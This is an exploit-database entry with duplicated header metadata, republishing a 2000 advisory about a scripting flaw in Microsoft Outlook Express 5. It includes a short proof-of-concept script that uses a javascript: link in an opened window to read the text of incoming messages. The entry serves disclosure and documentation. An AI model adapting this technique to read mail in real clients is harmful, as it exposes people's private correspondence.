Microsoft Outlook Express 5 - JavaScript Email Access
| EKU-ID: 25327 | CVE: CVE-2000-0653;OSVDB-7902;CVE-2000-0105 | OSVDB-ID: |
| Author: Georgi Guninski | Published: 2000-02-01 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 25327 | CVE: CVE-2000-0653;OSVDB-7902;CVE-2000-0105 | OSVDB-ID: |
| Author: Georgi Guninski | Published: 2000-02-01 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/962/info
Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run.
Example code:
<SCRIPT>
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>");
a.x=window.document;
</SCRIPT>